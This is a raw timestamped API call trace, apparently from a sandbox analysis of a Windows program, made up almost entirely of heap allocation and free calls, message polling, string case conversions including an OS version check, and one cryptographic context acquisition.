[0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.095] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.095] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.096] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.096] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.096] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.096] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.097] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0255.097] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.099] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0255.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0255.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0255.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0255.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0255.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0255.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0255.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0255.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0255.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0255.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0255.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.102] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0255.104] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.105] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0255.105] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0255.105] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.105] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0255.105] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.105] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.106] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.106] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.106] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.106] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0255.106] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.106] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.106] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.106] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.107] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.107] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.107] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.107] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0255.107] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.108] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.108] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0255.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0255.108] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0255.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.109] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.109] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 